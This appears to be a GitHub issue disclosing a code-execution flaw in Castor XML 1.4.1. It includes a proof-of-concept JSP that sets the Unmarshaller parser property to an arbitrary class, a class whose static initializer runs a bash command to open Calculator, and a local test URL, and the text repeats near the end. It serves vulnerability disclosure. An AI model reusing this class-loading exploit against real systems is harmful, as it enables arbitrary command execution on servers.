Open amakerlee opened 2 years ago
Code execution when set the Property of the Unmarshaller
Send the request
any string
http://127.0.0.1:8080/xxxxxx/castor.jsp?param=any-string
<%@ page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8" %> <%@ page import="java.io.ByteArrayInputStream" %> <%@ page import="org.exolab.castor.xml.Unmarshaller" %> <%@ page import="javax.xml.transform.stream.StreamSource" %> <% try { String parameter = request.getParameter("param"); ByteArrayInputStream is = new ByteArrayInputStream(parameter.getBytes()); Unmarshaller unmarshaller = new Unmarshaller(); unmarshaller.setProperty("org.exolab.castor.parser", "test.security.CmdTest"); unmarshaller.unmarshal(new StreamSource(is)); } catch (Exception e) { e.printStackTrace(); } out.println("over...."); %>
package test.security; public class CmdTest { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"/bin/bash","-c","open -a Calculator.app"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { } } }
<dependency> <groupId>org.codehaus.castor</groupId> <artifactId>castor-xml</artifactId> <version>1.4.1</version> </dependency>
Code execution when set the Property of the Unmarshaller
Send the request
any string
http://127.0.0.1:8080/xxxxxx/castor.jsp?param=any-string